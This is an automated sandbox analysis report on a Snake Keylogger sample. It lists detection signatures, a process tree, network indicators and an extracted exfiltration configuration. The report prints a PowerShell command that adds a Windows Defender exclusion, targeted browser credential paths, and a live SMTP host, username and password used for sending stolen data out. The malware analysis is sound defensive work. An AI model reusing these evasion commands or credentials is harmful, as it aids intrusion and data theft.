Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
Analysis ID:1482926
MD5:967175d3aa79388fd8e84ccbf0b998c7
SHA1:9bb041c883354d306a22ea0faf9c8deecd9f14c0
SHA256:4607e74d7d23628239d2bdfc8d57236c09778517f758323e13fc9ca4092c07a7
Tags:exe
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Snake Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe (PID: 2924 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe" MD5: 967175D3AA79388FD8E84CCBF0B998C7)
    • powershell.exe (PID: 3408 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 4408 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "grafik@erkanlarofis.com.tr", "Password": "19261926+-", "Host": "mail.erkanlarofis.com.tr", "Port": "587"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.3267531741.0000000002C7D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000004.00000002.3264630620.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        00000004.00000002.3264630620.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x14347:$a1: get_encryptedPassword
        • 0x1462b:$a2: get_encryptedUsername
        • 0x14153:$a3: get_timePasswordChanged
        • 0x1424e:$a4: get_passwordField
        • 0x1435d:$a5: set_encryptedPassword
        • 0x159bb:$a7: get_logins
        • 0x1591e:$a10: KeyLoggerEventArgs
        • 0x15589:$a11: KeyLoggerEventArgsEventHandler
        00000004.00000002.3264630620.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
        • 0x17ca0:$x1: $%SMTPDV$
        • 0x17d06:$x2: $#TheHashHere%&
        • 0x19369:$x3: %FTPDV$
        • 0x1945d:$x4: $%TelegramDv$
        • 0x15589:$x5: KeyLoggerEventArgs
        • 0x1591e:$x5: KeyLoggerEventArgs
        • 0x1938d:$m2: Clipboard Logs ID
        • 0x195ad:$m2: Screenshot Logs ID
        • 0x196bd:$m2: keystroke Logs ID
        • 0x19997:$m3: SnakePW
        • 0x19585:$m4: \SnakeKeylogger\
        00000004.00000002.3267531741.0000000002B89000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          Click to see the 11 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
            0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
            • 0x12747:$a1: get_encryptedPassword
            • 0x12a2b:$a2: get_encryptedUsername
            • 0x12553:$a3: get_timePasswordChanged
            • 0x1264e:$a4: get_passwordField
            • 0x1275d:$a5: set_encryptedPassword
            • 0x13dbb:$a7: get_logins
            • 0x13d1e:$a10: KeyLoggerEventArgs
            • 0x13989:$a11: KeyLoggerEventArgsEventHandler
            0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
            • 0x1a1ab:$a2: \Comodo\Dragon\User Data\Default\Login Data
            • 0x193dd:$a3: \Google\Chrome\User Data\Default\Login Data
            • 0x19810:$a4: \Orbitum\User Data\Default\Login Data
            • 0x1a84f:$a5: \Kometa\User Data\Default\Login Data
            0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
            • 0x13316:$s1: UnHook
            • 0x1331d:$s2: SetHook
            • 0x13325:$s3: CallNextHook
            • 0x13332:$s4: _hook
            0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.unpackMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
            • 0x160a0:$x1: $%SMTPDV$
            • 0x16106:$x2: $#TheHashHere%&
            • 0x17769:$x3: %FTPDV$
            • 0x1785d:$x4: $%TelegramDv$
            • 0x13989:$x5: KeyLoggerEventArgs
            • 0x13d1e:$x5: KeyLoggerEventArgs
            • 0x1778d:$m2: Clipboard Logs ID
            • 0x179ad:$m2: Screenshot Logs ID
            • 0x17abd:$m2: keystroke Logs ID
            • 0x17d97:$m3: SnakePW
            • 0x17985:$m4: \SnakeKeylogger\
            Click to see the 23 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, ParentProcessId: 2924, ParentProcessName: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe", ProcessId: 3408, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, ParentProcessId: 2924, ParentProcessName: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe", ProcessId: 3408, ProcessName: powershell.exe
            Sigma detected: Suspicious Outbound SMTP Connections
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 77.245.159.7, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, Initiated: true, ProcessId: 4040, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49730
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, ParentProcessId: 2924, ParentProcessName: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe", ProcessId: 3408, ProcessName: powershell.exe

            Snort Signatures

            No Snort rule has matched

            Suricata Signatures

            Timestamp:2024-07-26T11:39:04.892508+0200
            SID:2803274
            Source Port:49706
            Destination Port:80
            Protocol:TCP
            Classtype:Potentially Bad Traffic
            Timestamp:2024-07-26T11:39:07.660193+0200
            SID:2803305
            Source Port:49713
            Destination Port:443
            Protocol:TCP
            Classtype:Unknown Traffic
            Timestamp:2024-07-26T11:39:11.471883+0200
            SID:2803305
            Source Port:49719
            Destination Port:443
            Protocol:TCP
            Classtype:Unknown Traffic
            Timestamp:2024-07-26T11:39:45.208289+0200
            SID:2044767
            Source Port:49734
            Destination Port:587
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-26T11:39:06.402996+0200
            SID:2803305
            Source Port:49711
            Destination Port:443
            Protocol:TCP
            Classtype:Unknown Traffic
            Timestamp:2024-07-26T11:39:17.988539+0200
            SID:2022930
            Source Port:443
            Destination Port:49724
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-26T11:39:35.846618+0200
            SID:2044767
            Source Port:49731
            Destination Port:587
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-26T11:39:05.782404+0200
            SID:2803274
            Source Port:49706
            Destination Port:80
            Protocol:TCP
            Classtype:Potentially Bad Traffic
            Timestamp:2024-07-26T11:39:38.805311+0200
            SID:2044767
            Source Port:49732
            Destination Port:587
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-26T11:38:56.204357+0200
            SID:2044767
            Source Port:49730
            Destination Port:587
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-26T11:39:08.938329+0200
            SID:2803305
            Source Port:49715
            Destination Port:443
            Protocol:TCP
            Classtype:Unknown Traffic
            Timestamp:2024-07-26T11:39:07.032437+0200
            SID:2803274
            Source Port:49712
            Destination Port:80
            Protocol:TCP
            Classtype:Potentially Bad Traffic
            Timestamp:2024-07-26T11:39:55.942378+0200
            SID:2022930
            Source Port:443
            Destination Port:49736
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeAvira: detected
            Found malware configuration
            Source: 00000004.00000002.3267531741.00000000029C1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "grafik@erkanlarofis.com.tr", "Password": "19261926+-", "Host": "mail.erkanlarofis.com.tr", "Port": "587"}
            Multi AV Scanner detection for submitted file
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeVirustotal: Detection: 28%Perma Link
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeJoe Sandbox ML: detected

            Location Tracking

            barindex
            Tries to detect the country of the analysis system (by using the IP)
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49710 version: TLS 1.0
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: PHCd.pdbSHA256 source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Source: Binary string: PHCd.pdb source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4x nop then jmp 06ADD0CFh0_2_06ADD2A4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4x nop then jmp 00FAF20Eh4_2_00FAF01F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4x nop then jmp 00FAFB98h4_2_00FAF01F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_00FAE540
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_00FAEB73
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_00FAED54

            Networking

            barindex
            Yara detected Generic Downloader
            Source: Yara matchFile source: 4.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.raw.unpack, type: UNPACKEDPE
            Source: global trafficTCP traffic: 192.168.2.5:49730 -> 77.245.159.7:587
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: NIOBEBILISIMHIZMETLERITR NIOBEBILISIMHIZMETLERITR
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: global trafficTCP traffic: 192.168.2.5:49730 -> 77.245.159.7:587
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49710 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: mail.erkanlarofis.com.tr
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002A84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002A78000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B17000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B24000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B4D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002AC7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002A84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.00000000029C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000000.00000002.2031188002.0000000003706000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3264630620.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002B40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgp
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002C93000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002C7D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CD8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3267531741.0000000002CA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://erkanlarofis.com.tr
